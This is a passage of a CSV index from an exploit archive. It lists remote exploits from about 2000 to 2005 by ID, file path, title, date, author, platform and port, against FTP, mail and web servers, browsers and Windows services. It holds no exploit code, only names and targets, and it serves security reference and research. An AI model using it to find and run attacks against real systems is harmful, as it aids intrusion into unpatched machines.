Overflow",2004-08-03,Andi,remote,linux,21 +373,exploits/linux/remote/373.c,"OpenFTPd 0.30.1 - message system Remote Shell",2004-08-04,infamous41md,remote,linux,21 +378,exploits/windows/remote/378.pl,"BlackJumboDog FTP Server - Remote Buffer Overflow",2004-08-05,"Tal Zeltzer",remote,windows,21 +379,exploits/linux/remote/379.txt,"CVSTrac - Arbitrary Code Execution",2004-08-06,anonymous,remote,linux, +380,exploits/linux/remote/380.c,"Pavuk Digest - Authentication Remote Buffer Overflow",2004-08-08,infamous41md,remote,linux,80 +382,exploits/linux/remote/382.c,"Melange Chat Server 1.10 - Remote Buffer Overflow",2002-12-24,innerphobia,remote,linux, +386,exploits/linux/remote/386.c,"xine 0.99.2 - Remote Stack Overflow",2004-08-09,c0ntex,remote,linux,80 +387,exploits/linux/remote/387.c,"Dropbear SSH 0.34 - Remote Code Execution",2004-08-09,livenn,remote,linux,22 +389,exploits/linux/remote/389.c,"LibPNG Graphics Library - Remote Buffer Overflow",2004-08-11,infamous41md,remote,linux, +390,exploits/linux/remote/390.c,"GV PostScript Viewer - Remote Buffer Overflow (1)",2004-08-13,infamous41md,remote,linux, +391,exploits/osx/remote/391.pl,"Apple Mac OSX 10.3.3 - AppleFileServer Overflow Remote Code Execution",2004-08-13,"Dino Dai Zovi",remote,osx,548 +392,exploits/linux/remote/392.c,"Remote CVS 1.11.15 - 'error_prog_name' Arbitrary Code Execution",2004-08-13,"Gyan Chawdhary",remote,linux,2401 +397,exploits/linux/remote/397.c,"WU-IMAP 2000.287(1-2) - Remote Overflow",2002-06-25,Teso,remote,linux,143 +398,exploits/linux/remote/398.c,"rsync 2.5.1 - Remote (1)",2002-01-01,Teso,remote,linux,873 +399,exploits/linux/remote/399.c,"rsync 2.5.1 - Remote (2)",2002-01-01,Teso,remote,linux,873 +400,exploits/linux/remote/400.c,"GV PostScript Viewer - Remote Buffer Overflow (2)",2004-08-18,infamous41md,remote,linux, +404,exploits/linux/remote/404.pl,"PlaySms 0.7 - SQL Injection",2004-08-19,"Noam Rathaus",remote,linux, +408,exploits/linux/remote/408.c,"Qt - '.bmp' Parsing Bug Heap Overflow",2004-08-21,infamous41md,remote,linux, +409,exploits/bsd/remote/409.c,"BSD - 'TelnetD' Remote Command Execution (1)",2001-06-09,Teso,remote,bsd,23 +413,exploits/linux/remote/413.c,"MusicDaemon 0.0.3 - Remote Denial of Service / '/etc/shadow' Stealer (2)",2004-08-24,Tal0n,remote,linux, +416,exploits/linux/remote/416.c,"Hafiye 1.0 - Remote Terminal Escape Sequence Injection",2004-08-25,"Serkan Akpolat",remote,linux, +418,exploits/windows/remote/418.c,"Winamp 5.04 - '.wsz' Skin File Remote Code Execution",2004-08-25,"Petrol Designs",remote,windows, +421,exploits/windows/remote/421.c,"Gaucho 1.4 - Mail Client Buffer Overflow",2004-08-27,"Tan Chew Keong",remote,windows, +424,exploits/linux/remote/424.c,"Citadel/UX - Remote Buffer Overflow",2004-08-30,Nebunu,remote,linux,504 +425,exploits/hardware/remote/425.c,"D-Link DCS-900 Camera - Remote IP Address Changer",2004-08-31,anonymous,remote,hardware, +426,exploits/windows/remote/426.c,"Titan FTP Server - Long Command Heap Overflow (PoC)",2004-08-31,lion,remote,windows,21 +431,exploits/windows/remote/431.c,"AOL Instant Messenger AIM - 'Away' Message Remote (2)",2004-09-02,"John Bissell",remote,windows, +432,exploits/bsd/remote/432.c,"Courier-IMAP 3.0.2-r1 - 'auth_debug()' Remote Format String",2004-09-02,ktha,remote,bsd,143 +435,exploits/windows/remote/435.c,"Trillian 0.74i MSN Module - Remote Buffer Overflow",2004-09-08,Komrade,remote,windows, +437,exploits/linux/remote/437.c,"Citadel/UX 6.23 - Remote USER Directive",2004-09-09,Nebunu,remote,linux,504 +439,exploits/windows/remote/439.c,"BlackJumboDog FTP Server 3.6.1 - Remote Buffer Overflow",2004-09-12,Delikon,remote,windows,21 +472,exploits/windows/remote/472.c,"Microsoft Windows - JPEG GDI+ Overflow Shellcode",2004-09-22,FoToZ,remote,windows, +473,exploits/windows/remote/473.c,"Alt-N MDaemon 6.5.1 - IMAP/SMTP Remote Buffer Overflow",2004-09-22,D_BuG,remote,windows,143 +475,exploits/windows/remote/475.sh,"Microsoft Windows - JPEG GDI+ Overflow Administrator (MS04-028)",2004-09-23,"Elia Florio",remote,windows, +478,exploits/windows/remote/478.c,"Microsoft Windows - JPEG GDI+ Overflow Download Shellcode (MS04-028)",2004-09-25,ATmaCA,remote,windows, +480,exploits/windows/remote/480.c,"Microsoft Windows - JPEG GDI+ Remote Heap Overflow (MS04-028)",2004-09-25,"John Bissell",remote,windows, +556,exploits/windows/remote/556.c,"Microsoft Windows - JPEG GDI+ All-in-One Bind/Reverse/Admin/FileDownload",2004-09-27,M4Z3R,remote,windows, +566,exploits/windows/remote/566.pl,"IPSwitch WhatsUp Gold 8.03 - Remote Buffer Overflow",2004-10-04,LoWNOISE,remote,windows,80 +568,exploits/windows/remote/568.c,"Icecast 2.0.1 (Win32) - Remote Code Execution (1)",2004-10-06,Delikon,remote,windows,8000 +572,exploits/windows/remote/572.pl,"Eudora 6.2.0.7 - Attachment Spoofer",2004-10-11,"Paul Szabo",remote,windows, +573,exploits/windows/remote/573.c,"Icecast 2.0.1 (Win32) - Remote Code Execution (2)",2004-10-12,K-C0d3r,remote,windows,8000 +577,exploits/windows/remote/577.c,"YahooPOPs 1.6 - SMTP Port Buffer Overflow",2004-10-15,class101,remote,windows,25 +580,exploits/linux/remote/580.c,"Monit 4.2 - Basic Authentication Remote Code Execution",2004-10-17,rtk,remote,linux,2812 +581,exploits/linux/remote/581.c,"ProFTPd 1.2.10 - Remote Users Enumeration",2004-10-17,"Leon Juranic",remote,linux, +582,exploits/windows/remote/582.c,"YahooPOPs 1.6 - SMTP Remote Buffer Overflow",2004-10-18,"Diabolic Crab",remote,windows,25 +583,exploits/windows/remote/583.pl,"SLX Server 6.1 - Arbitrary File Creation (PoC)",2004-10-18,"Carl Livitt",remote,windows, +584,exploits/win_x86/remote/584.c,"Microsoft Windows (x86) - Metafile '.emf' Heap Overflow (MS04-032)",2004-10-20,houseofdabus,remote,win_x86, +588,exploits/windows/remote/588.py,"Ability Server 2.34 - FTP 'STOR' Remote Buffer Overflow",2004-10-21,muts,remote,windows,21 +589,exploits/windows/remote/589.html,"Multiple Browsers - Tabbed Browsing",2004-10-22,"Jakob Balle",remote,windows, +590,exploits/windows/remote/590.c,"ShixxNOTE 6.net - Remote Buffer Overflow",2004-10-22,class101,remote,windows,2000 +592,exploits/windows/remote/592.py,"Ability Server 2.34 - 'APPE' Remote Buffer Overflow",2004-10-23,KaGra,remote,windows,21 +598,exploits/windows/remote/598.py,"TABS MailCarrier 2.51 - SMTP 'EHLO' / 'HELO' Remote Buffer Overflow",2004-10-26,muts,remote,windows,25 +608,exploits/linux/remote/608.c,"WvTFTPd 0.9 - Remote Heap Overflow",2004-10-28,infamous41md,remote,linux,69 +609,exploits/linux/remote/609.txt,"zgv 5.5 - Multiple Arbitrary Code Executions (PoC)",2004-10-28,infamous41md,remote,linux, +612,exploits/windows/remote/612.html,"Microsoft Internet Explorer 6 - IFRAME Tag Buffer Overflow",2004-11-02,Skylined,remote,windows, +616,exploits/windows/remote/616.c,"MiniShare 1.4.1 - Remote Buffer Overflow (1)",2004-11-07,class101,remote,windows,80 +618,exploits/windows/remote/618.c,"Ability Server 2.34 (Unix) - FTP 'STOR' Remote Buffer Overflow",2004-11-07,NoPh0BiA,remote,windows,21 +619,exploits/windows/remote/619.c,"CCProxy Log - Remote Stack Overflow",2004-11-09,Ruder,remote,windows,808 +620,exploits/linux/remote/620.c,"Qwik SMTP 0.3 - Format String",2004-11-09,"Carlos Barros",remote,linux,25 +621,exploits/windows/remote/621.c,"CCProxy 6.2 - 'ping' Remote Buffer Overflow",2004-11-10,KaGra,remote,windows,23 +623,exploits/windows/remote/623.c,"SlimFTPd 3.15 - Remote Buffer Overflow",2004-11-10,class101,remote,windows,21 +627,exploits/windows/remote/627.pl,"IPSwitch IMail 8.13 - 'DELETE' Remote Stack Overflow",2004-11-12,Zatlander,remote,windows,143 +636,exploits/windows/remote/636.c,"MiniShare 1.4.1 - Remote Buffer Overflow (2)",2004-11-16,NoPh0BiA,remote,windows,80 +637,exploits/windows/remote/637.c,"TABS MailCarrier 2.51 - Remote Buffer Overflow",2004-11-16,NoPh0BiA,remote,windows,25 +638,exploits/windows/remote/638.py,"Seattle Lab Mail (SLmail) 5.5 - POP3 'PASS' Remote Buffer Overflow (1)",2004-11-18,muts,remote,windows,110 +640,exploits/windows/remote/640.c,"Microsoft Windows - Compressed Zipped Folders (MS04-034)",2004-11-19,tarako,remote,windows, +641,exploits/windows/remote/641.txt,"Microsoft Internet Explorer 6.0 SP2 - File Download Security Warning Bypass",2004-11-19,cyber_flash,remote,windows, +644,exploits/windows/remote/644.pl,"DMS POP3 Server 1.5.3 build 37 - Remote Buffer Overflow",2004-11-21,"Reed Arvin",remote,windows,110 +650,exploits/windows/remote/650.c,"CoffeeCup FTP Clients (Direct 6.2.0.62) (Free 3.0.0.10) - Remote Buffer Overflow",2004-11-22,Komrade,remote,windows, +652,exploits/linux/remote/652.c,"Prozilla 1.3.6 - Remote Stack Overflow",2004-11-23,"Serkan Akpolat",remote,linux,8080 +654,exploits/windows/remote/654.c,"Winamp 5.06 - 'IN_CDDA.dll' Remote Buffer Overflow",2004-11-24,k-otik,remote,windows, +658,exploits/windows/remote/658.c,"MailEnable Mail Server IMAP 1.52 - Remote Buffer Overflow",2004-11-25,class101,remote,windows,143 +660,exploits/linux/remote/660.c,"PHP 4.3.7/5.0.0RC3 - 'memory_limit' Remote Overflow",2004-11-27,"Gyan Chawdhary",remote,linux,80 +663,exploits/windows/remote/663.py,"Mercury/32 Mail Server 4.01 - 'Pegasus' IMAP Buffer Overflow (3)",2004-11-29,muts,remote,windows,143 +668,exploits/windows/remote/668.c,"Mercury/32 Mail Server 4.01 - 'Pegasus' IMAP Buffer Overflow (1)",2004-11-30,JohnH,remote,windows,143 +670,exploits/windows/remote/670.c,"Mercury/32 Mail Server 4.01 - 'Pegasus' IMAP Buffer Overflow (2)",2004-12-01,JohnH,remote,windows,143 +675,exploits/windows/remote/675.txt,"Hosting Controller 0.6.1 Hotfix 1.4 - Directory Browsing",2004-12-05,Mouse,remote,windows, +681,exploits/linux/remote/681.c,"Citadel/UX 6.27 - Format String",2004-12-12,CoKi,remote,linux,504 +689,exploits/multiple/remote/689.pl,"wget 1.9 - Directory Traversal",2004-12-15,jjminar,remote,multiple, +693,exploits/windows/remote/693.c,"Ability Server 2.34 - Remote APPE Buffer Overflow",2004-12-16,darkeagle,remote,windows,21 +705,exploits/multiple/remote/705.pl,"Webmin - Brute Force / Command Execution",2004-12-22,Di42lo,remote,multiple,10000 +711,exploits/windows/remote/711.c,"CrystalFTP Pro 2.8 - Remote Buffer Overflow",2005-04-24,cybertronic,remote,windows,21 +712,exploits/linux/remote/712.c,"SHOUTcast DNAS/Linux 1.9.4 - Format String Remote Overflow",2004-12-23,pucik,remote,linux,8000 +716,exploits/solaris/remote/716.c,"Solaris 2.5.1/2.6/7/8 rlogin (SPARC) - '/bin/login' Remote Buffer Overflow",2004-12-24,"Marco Ivaldi",remote,solaris,513 +719,exploits/windows/remote/719.txt,"Microsoft Internet Explorer (Windows XP SP2) - HTML Help Control Local Zone Bypass",2004-12-25,Paul,remote,windows, +726,exploits/windows/remote/726.c,"Netcat 1.1 - '-e' Switch Remote Buffer Overflow",2004-12-26,class101,remote,windows, +729,exploits/windows/remote/729.txt,"PHP 4.3.7 - 'openlog()' Remote Buffer Overflow",2004-12-28,"The Warlock [BhQ]",remote,windows,80 +730,exploits/windows/remote/730.html,"Microsoft Internet Explorer - Remote Code Execution (PoC)",2004-12-28,ShredderSub7,remote,windows, +733,exploits/windows/remote/733.c,"Microsoft Windows Server 2000 - WINS Remote Code Execution",2004-12-31,zuc,remote,windows,42 +734,exploits/windows/remote/734.c,"Microsoft Windows - NetDDE Remote Buffer Overflow (MS04-031)",2004-12-31,houseofdabus,remote,windows,139 +745,exploits/multiple/remote/745.cgi,"Webmin 1.5 - Web Brute Force (CGI)",2005-01-08,ZzagorR,remote,multiple,10000 +746,exploits/multiple/remote/746.pl,"Webmin 1.5 - Brute Force / Command Execution",2005-01-08,ZzagorR,remote,multiple,10000 +750,exploits/windows/remote/750.c,"Veritas Backup Exec Agent 8.x/9.x - Browser Overflow",2005-01-11,class101,remote,windows,6101 +753,exploits/windows/remote/753.html,"Microsoft Internet Explorer - '.ANI' Remote Stack Overflow (MS05-002) (2)",2005-01-12,Skylined,remote,windows, +759,exploits/windows/remote/759.cpp,"Apple iTunes - Playlist Buffer Overflow Download Shellcode",2005-01-16,ATmaCA,remote,windows, +761,exploits/windows/remote/761.cpp,"NodeManager Professional 2.00 - Remote Buffer Overflow",2005-01-18,"Tan Chew Keong",remote,windows,162 +764,exploits/unix/remote/764.c,"Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow",2003-04-04,spabam,remote,unix,80 +765,exploits/windows/remote/765.c,"Microsoft Internet Explorer - '.ANI' Universal (MS05-002)",2005-01-22,houseofdabus,remote,windows, +767,exploits/windows/remote/767.pl,"Golden FTP Server 2.02b - Remote Buffer Overflow",2005-01-22,Barabas,remote,windows,21 +771,exploits/windows/remote/771.cpp,"Microsoft Internet Explorer - '.ANI' Downloader (MS05-002)",2005-01-24,Vertygo,remote,windows, +775,exploits/linux/remote/775.c,"Berlios GPSD 2.7.x - Remote Format String",2005-01-26,JohnH,remote,linux,2947 +781,exploits/windows/remote/781.py,"Savant Web Server 3.1 - Remote Buffer Overflow (1)",2005-02-01,"Tal Zeltzer",remote,windows,80 +784,exploits/linux/remote/784.c,"ngIRCd 0.8.2 - Remote Format String",2005-02-03,CoKi,remote,linux,6667 +785,exploits/linux/remote/785.c,"Newspost 2.1 - 'socket_getline()' Remote Buffer Overflow (2)",2005-02-03,cybertronic,remote,linux,119 +787,exploits/windows/remote/787.pl,"Savant Web Server 3.1 (Windows 2003) - Remote Buffer Overflow",2005-02-04,CorryL,remote,windows,80 +794,exploits/windows/remote/794.c,"3CServer 1.1 (FTP Server) - Remote Overflow",2005-02-07,mandragore,remote,windows,21 +802,exploits/windows/remote/802.cpp,"MSN Messenger - '.png' Image Buffer Overflow Download Shellcode",2005-02-09,ATmaCA,remote,windows, +804,exploits/windows/remote/804.c,"MSN Messenger (Linux) - '.png' Image Buffer Overflow",2005-02-09,dgr,remote,windows, +805,exploits/multiple/remote/805.c,"ELOG 2.5.6 - Remote Shell",2005-02-09,n4rk0tix,remote,multiple,8080 +806,exploits/linux/remote/806.c,"Prozilla 1.3.7.3 - Remote Format String",2005-02-09,"Serkan Akpolat",remote,linux,8080 +812,exploits/linux/remote/812.c,"Exim 4.43 - 'auth_spa_server()' Remote (PoC)",2005-02-12,"Yuri Gushin",remote,linux,25 +819,exploits/windows/remote/819.py,"Savant Web Server 3.1 (French Windows)- Remote Buffer Overflow",2005-02-15,"Jerome Athias",remote,windows,80 +822,exploits/windows/remote/822.c,"RhinoSoft Serv-U FTPd Server 4.x - 'site chmod' Remote Buffer Overflow",2004-01-30,Skylined,remote,windows,21 +823,exploits/windows/remote/823.c,"BolinTech DreamFTP Server 1.2 (1.02/TryFTP 1.0.0.1) - Remote User Name Format String",2004-02-11,Skylined,remote,windows,21 +825,exploits/windows/remote/825.c,"3Com FTP Server 2.0 - Remote Overflow",2005-02-17,c0d3r,remote,windows,21 +826,exploits/linux/remote/826.c,"Medal of Honor Spearhead (Linux) - Server Remote Buffer Overflow",2005-02-18,millhouse,remote,linux,12203 +827,exploits/windows/remote/827.c,"3Com 3CDaemon FTP - Unauthorized 'USER' Remote Buffer Overflow",2005-02-18,class101,remote,windows,21 +828,exploits/multiple/remote/828.c,"Knox Arkeia Server Backup 5.3.x - Remote Code Execution",2005-02-18,"John Doe",remote,multiple,617 +829,exploits/hardware/remote/829.c,"Thomson TCW690 - POST Password Validation",2005-02-19,MurDoK,remote,hardware,80 +830,exploits/windows/remote/830.c,"SHOUTcast 1.9.4 (Windows) - File Request Format String Remote Overflow",2005-02-19,mandragore,remote,windows,8000 +831,exploits/linux/remote/831.c,"GNU Cfengine 2.17p1 - RSA Authentication Heap Overflow",2005-02-20,jsk,remote,linux,5803 +845,exploits/windows/remote/845.c,"BadBlue 2.5 - Easy File Sharing Remote Buffer Overflow",2005-02-27,class101,remote,windows,80 +847,exploits/windows/remote/847.cpp,"BadBlue 2.55 - Web Server Remote Buffer Overflow",2005-02-27,tarako,remote,windows,80 +854,exploits/windows/remote/854.cpp,"Foxmail 1.1.0.1 - POP3 Temp Dir Stack Overflow",2005-03-02,Swan,remote,windows,110 +859,exploits/windows/remote/859.c,"CA License Server - 'GETCONFIG' Remote Buffer Overflow",2005-03-06,class101,remote,windows,10203 +868,exploits/windows/remote/868.cpp,"Microsoft Internet Explorer - 'mshtml.dll' CSS Parsing Buffer Overflow",2005-03-09,Arabteam2000,remote,windows, +875,exploits/windows/remote/875.c,"Sentinel LM 7.x - UDP License Service Remote Buffer Overflow",2005-03-13,class101,remote,windows,5093 +878,exploits/linux/remote/878.c,"Ethereal 0.10.9 (Linux) - '3G-A11' Remote Buffer Overflow",2005-03-14,"Diego Giagio",remote,linux, +879,exploits/multiple/remote/879.pl,"LimeWire 4.1.2 < 4.5.6 - 'GET' Remote File Read",2005-03-14,lammat,remote,multiple, +883,exploits/windows/remote/883.c,"GoodTech Telnet Server < 5.0.7 - Remote Buffer Overflow (2)",2005-04-24,cybertronic,remote,windows,2380 +900,exploits/linux/remote/900.c,"Smail 3.2.0.120 - Remote Heap Overflow",2005-03-28,infamous41md,remote,linux,25 +902,exploits/linux/remote/902.c,"mtftpd 0.0.3 - Remote Code Execution",2005-03-29,darkeagle,remote,linux,21 +903,exploits/linux/remote/903.c,"Cyrus imapd 2.2.4 < 2.2.8 - 'imapmagicplus' Remote Overflow",2005-03-29,crash-x,remote,linux,143 +906,exploits/windows/remote/906.c,"BakBone NetVault 6.x/7.x - Remote Heap Buffer Overflow (2)",2005-04-01,class101,remote,windows,20031 +909,exploits/windows/remote/909.cpp,"Microsoft Windows - 'WINS' Remote Buffer Overflow (MS04-045) (3)",2005-04-12,class101,remote,windows,42 +915,exploits/linux/remote/915.c,"MailEnable Enterprise 1.x - IMAPd Remote Overflow",2005-04-05,Expanders,remote,linux,143 +930,exploits/windows/remote/930.html,"Microsoft Internet Explorer - DHTML Object Memory Corruption",2005-04-12,Skylined,remote,windows, +934,exploits/linux/remote/934.c,"gld 1.4 - Postfix Greylisting Daemon Remote Format String",2005-04-13,Xpl017Elz,remote,linux,2525 +940,exploits/linux/remote/940.c,"Sumus 0.2.2 - HTTPd Remote Buffer Overflow",2005-04-14,vade79,remote,linux,81 +943,exploits/windows/remote/943.html,"Mozilla Browsers - x (Link) Code Execution",2005-04-18,"Michael Krax",remote,windows, +944,exploits/windows/remote/944.c,"WheresJames Webcam Publisher Beta 2.0.0014 - Remote Buffer Overflow",2005-04-18,tarako,remote,windows, +945,exploits/windows/remote/945.c,"PMSoftware Simple Web Server - GET Remote Buffer Overflow",2005-04-24,cybertronic,remote,windows,80 +947,exploits/windows/remote/947.pl,"Microsoft Exchange Server - Remote Code Execution (MS05-021)",2005-04-19,"Evgeny Pinchuk",remote,windows,25 +949,exploits/windows/remote/949.c,"PMSoftware Simple Web Server 1.0 - Remote Stack Overflow",2005-04-20,c0d3r,remote,windows,80 +952,exploits/windows/remote/952.pl,"MailEnable Enterprise & Professional - https Remote Buffer Overflow",2005-04-25,CorryL,remote,windows,8080 +953,exploits/windows/remote/953.c,"Yager 5.24 - Remote Buffer Overflow",2005-04-25,cybertronic,remote,windows,1089 +955,exploits/windows/remote/955.py,"NetFTPd 4.2.2 - User Authentication Remote Buffer Overflow",2005-04-26,"Sergio Alvarez",remote,windows,21 +960,exploits/windows/remote/960.c,"MySQL MaxDB Webtool 7.5.00.23 - Remote Stack Overflow",2005-04-27,cybertronic,remote,windows,9999 +967,exploits/windows/remote/967.cpp,"Golden FTP Server Pro 2.52 - Remote Buffer Overflow (1)",2005-04-29,ATmaCA,remote,windows,21 +968,exploits/windows/remote/968.c,"Golden FTP Server Pro 2.52 - Remote Buffer Overflow (2)",2005-04-29,c0d3r,remote,windows,21 +969,exploits/windows/remote/969.c,"Golden FTP Server Pro 2.52 - Remote Buffer Overflow (3)",2005-04-29,darkeagle,remote,windows,21 +970,exploits/linux/remote/970.c,"Snmppd - SNMP Proxy Daemon Remote Format String",2005-04-29,cybertronic,remote,linux,164 +975,exploits/windows/remote/975.py,"GlobalScape Secure FTP Server 3.0 - Remote Buffer Overflow",2005-05-01,muts,remote,windows,21 +976,exploits/windows/remote/976.cpp,"Microsoft Windows - WINS Vulnerability + OS/SP Scanner",2005-05-02,class101,remote,windows, +977,exploits/hp-ux/remote/977.c,"HP-UX FTPD 1.1.214.4 - 'REST' Remote Brute Force",2005-05-03,phased,remote,hp-ux, +979,exploits/windows/remote/979.txt,"Hosting Controller 0.6.1 - Unauthenticated User Registration (1)",2005-05-04,Mouse,remote,windows, +981,exploits/linux/remote/981.c,"dSMTP Mail Server 3.1b (Linux) - Format String",2005-05-05,cybertronic,remote,linux,25 +986,exploits/windows/remote/986.html,"Mozilla Firefox 1.0.3 - Install Method Arbitrary Code Execution",2005-05-07,"Edward Gagnon",remote,windows, +987,exploits/windows/remote/987.c,"Hosting Controller 0.6.1 - Unauthenticated User Registration (2)",2005-05-07,Silentium,remote,windows, +990,exploits/windows/remote/990.c,"BakBone NetVault 6.x/7.x - Remote Heap Buffer Overflow (1)",2005-05-17,nolimit,remote,windows,20031 +1007,exploits/multiple/remote/1007.html,"Mozilla Firefox - view-source:JavaScript url Code Execution",2005-05-21,mikx,remote,multiple, +1021,exploits/linux/remote/1021.c,"Ethereal 0.10.10 - 'SIP' Protocol Dissector Remote Buffer Overflow",2005-05-31,"Team W00dp3ck3r",remote,linux, +1026,exploits/windows/remote/1026.cpp,"e-Post SPA-PRO 4.01 - 'imap' Remote Buffer Overflow",2005-06-02,"Jerome Athias",remote,windows,143 +1028,exploits/windows/remote/1028.c,"Crob FTP Server 3.6.1 - Remote Stack Overflow",2005-06-03,"Leon Juranic",remote,windows, +1035,exploits/windows/remote/1035.c,"IPSwitch IMAP Server - LOGON Remote Stack Overflow",2005-06-07,nolimit,remote,windows,143 +1038,exploits/linux/remote/1038.c,"GNU Mailutils imap4d 0.5 < 0.6.90 - Remote Format String",2005-06-10,qobaiashi,remote,linux,143 +1047,exploits/linux/remote/1047.pl,"ViRobot Advanced Server 2.0 - 'addschup' Remote Cookie",2005-06-14,"Kevin Finisterre",remote,linux,8080 +1055,exploits/linux/remote/1055.c,"PeerCast 0.1211 - Remote Format String",2005-06-20,darkeagle,remote,linux,7144 +1066,exploits/windows/remote/1066.cpp,"Microsoft Outlook Express - NNTP Buffer Overflow (MS05-030)",2005-06-24,eyas,remote,windows, +1075,exploits/windows/remote/1075.c,"Microsoft Windows Message Queuing - Remote Buffer Overflow Universal (MS05-017) (v.0.3)",2005-06-29,houseofdabus,remote,windows,2103 +1079,exploits/windows/remote/1079.html,"Microsoft Internet Explorer - 'javaprxy.dll' COM Object Remote Overflow",2005-07-05,k-otik,remote,windows, +1081,exploits/hardware/remote/1081.c,"Nokia Affix < 3.2.0 - btftp Remote Client",2005-07-03,"Kevin Finisterre",remote,hardware, +1089,exploits/windows/remote/1089.c,"Mozilla FireFox 1.0.1 - Remote GIF Heap Overflow",2005-07-05,darkeagle,remote,windows, +1096,exploits/windows/remote/1096.txt,"Hosting Controller 0.6.1 HotFix 2.1 - Change Credit Limit",2005-07-10,"Soroush Dalili",remote,windows, +1099,exploits/windows/remote/1099.pl,"Baby Web Server 2.6.2 - Command Validation",2005-07-11,basher13,remote,windows, +1102,exploits/windows/remote/1102.html,"Mozilla Firefox 1.0.4 - 'Set As Wallpaper' Code Execution",2005-07-13,"Michael Krax",remote,windows, +1108,exploits/windows/remote/1108.pl,"Small HTTP Server 3.05.28 - Arbitrary Data Execution",2005-07-15,basher13,remote,windows, +1114,exploits/multiple/remote/1114.c,"HP OpenView OmniBack II - Generic Remote Command Execution",2000-12-21,DiGiT,remote,multiple,5555 +1115,exploits/windows/remote/1115.pl,"Intruder Client 1.00 - Remote Command Execution / Denial of Service",2005-07-21,basher13,remote,windows, +1118,exploits/windows/remote/1118.c,"SlimFTPd 3.16 - Remote Buffer Overflow",2005-07-25,redsand,remote,windows,21 +1123,exploits/linux/remote/1123.c,"GNU Mailutils imap4d 0.6 - Remote Format String",2005-08-01,CoKi,remote,linux,143 +1124,exploits/linux/remote/1124.pl,"IPSwitch IMail Server 8.15 - IMAPD Remote Code Execution",2005-08-01,kingcope,remote,linux,143 +1130,exploits/windows/remote/1130.c,"CA BrightStor ARCserve Backup Agent - 'dbasqlr.exe' Remote Overflow",2005-08-03,cybertronic,remote,windows,6070 +1131,exploits/windows/remote/1131.c,"CA BrightStor ARCserve Backup - 'dsconfig.exe' Remote Buffer Overflow",2005-08-03,cybertronic,remote,windows,41523 +1132,exploits/windows/remote/1132.c,"CA BrightStor ARCserve Backup - Remote Overflow",2005-08-03,cybertronic,remote,windows,6070 +1138,exploits/linux/remote/1138.c,"nbSMTP 0.99 - 'util.c' Client-Side Command Execution",2005-08-05,CoKi,remote,linux, +1139,exploits/linux/remote/1139.c,"Ethereal 10.x - AFP Protocol Dissector Remote Format String",2005-08-06,vade79,remote,linux, +1144,exploits/windows/remote/1144.html,"Microsoft Internet Explorer - 'blnmgr.dll' COM Object Remote (MS05-038)",2005-08-09,FrSIRT,remote,windows, +1146,exploits/windows/remote/1146.c,"Microsoft Windows - Plug-and-Play Service Remote Overflow (MS05-039)",2005-08-11,sl0ppy,remote,windows,139 +1147,exploits/windows/remote/1147.pm,"Veritas Backup Exec (Windows) - Remote File Access (Metasploit)",2005-08-11,Metasploit,remote,windows,10000 +1149,exploits/windows/remote/1149.c,"Microsoft Windows Plug-and-Play Service - Remote Universal (MS05-039)",2005-08-12,houseofdabus,remote,windows,445 +1150,exploits/windows/remote/1150.pm,"Novell ZENworks 6.5 - Desktop/Server Management Remote Stack Overflow (Metasploit)",2005-08-12,Metasploit,remote,windows,1761 +1151,exploits/windows/remote/1151.pm,"MDaemon 8.0.3 - IMAPD CRAM-MD5 Authentication Overflow (Metasploit)",2005-08-12,Metasploit,remote,windows,143 +1152,exploits/windows/remote/1152.pm,"Novell eDirectory 8.7.3 - iMonitor Remote Stack Overflow (Metasploit)",2005-08-12,Metasploit,remote,windows,8008 +1167,exploits/solaris/remote/1167.pm,"Solaris 10 LPD - Arbitrary File Delete (Metasploit)",2005-08-19,Optyx,remote,solaris, +1171,exploits/linux/remote/1171.c,"Elm < 2.5.8 - Expires Header Remote Buffer Overflow",2005-08-22,c0ntex,remote,linux, +1178,exploits/windows/remote/1178.c,"Microsoft IIS 5.0 - '500-100.asp' Server Name Spoof",2005-08-25,Lympex,remote,windows, +1179,exploits/windows/remote/1179.c,"Microsoft Windows Plug-and-Play Service - Remote Universal (Spanish) (MS05-039)",2005-08-25,RoMaNSoFt,remote,windows,445 +1180,exploits/windows/remote/1180.c,"Microsoft Windows Plug-and-Play Service (French) - Remote Universal (MS05-039)",2005-08-25,"Fabrice Mourron",remote,windows,445 +1183,exploits/windows/remote/1183.c,"Battlefield (BFCC < 1.22_A /BFVCC < 2.14_B / BF2CC) - Authentication Bypass / Password Stealer / Denial of Service",2005-08-29,"Luigi Auriemma",remote,windows, +1184,exploits/windows/remote/1184.c,"Savant Web Server 3.1 - Remote Buffer Overflow (2)",2005-08-30,basher13,remote,windows,80 +1188,exploits/multiple/remote/1188.c,"HP OpenView Network Node Manager 7.50 - Remote Command Execution",2005-08-30,Lympex,remote,multiple, +1190,exploits/windows/remote/1190.c,"DameWare Mini Remote Control 4.0 < 4.9 - Client Agent Remote Overflow",2005-08-31,jpno5,remote,windows,6129 +1193,exploits/windows/remote/1193.pl,"Free SMTP Server 2.2 - Spam Filter",2005-09-02,basher13,remote,windows, +1201,exploits/windows/remote/1201.pl,"FTP Internet Access Manager 1.2 - Command Execution",2005-09-07,basher13,remote,windows, +1209,exploits/linux/remote/1209.c,"GNU Mailutils imap4d 0.6 - 'Search' Remote Format String",2005-09-10,"Clément Lecigne",remote,linux,143 +1210,exploits/windows/remote/1210.pm,"Alt-N WebAdmin 2.0.4 - USER Buffer Overflow (Metasploit)",2005-09-11,y0,remote,windows,1000 +1223,exploits/windows/remote/1223.c,"Mercury/32 Mail Server 4.01a (Pegasus) - IMAP Buffer Overflow",2005-09-20,c0d3r,remote,windows,143 +1224,exploits/windows/remote/1224.html,"Mozilla Browsers - 0xAD (HOST:) Remote Heap Buffer Overrun (2)",2005-09-22,Skylined,remote,windows, +1231,exploits/linux/remote/1231.pl,"WzdFTPD 0.5.4 - Remote Command Execution",2005-09-24,kingcope,remote,linux,21 +1232,exploits/linux/remote/1232.c,"RealPlayer/Helix Player (Linux) - Remote Format String",2005-09-26,c0ntex,remote,linux, +1234,exploits/bsd/remote/1234.c,"GNU Mailutils imap4d 0.6 (FreeBSD) - 'Search' Remote Format String",2005-09-26,"Angelo Rosiello",remote,bsd,143 +1238,exploits/linux/remote/1238.c,"Prozilla 1.3.7.4 - 'ftpsearch' Results Handling Buffer Overflow",2005-10-02,taviso,remote,linux,8080 +1242,exploits/linux/remote/1242.pl,"Xine-Lib 1.1 - 'Media Player Library' Remote Format String",2005-10-10,"Ulf Harnhammar",remote,linux, +1243,exploits/windows/remote/1243.c,"CA iTechnology iGateway - 'Debug Mode' Remote Buffer 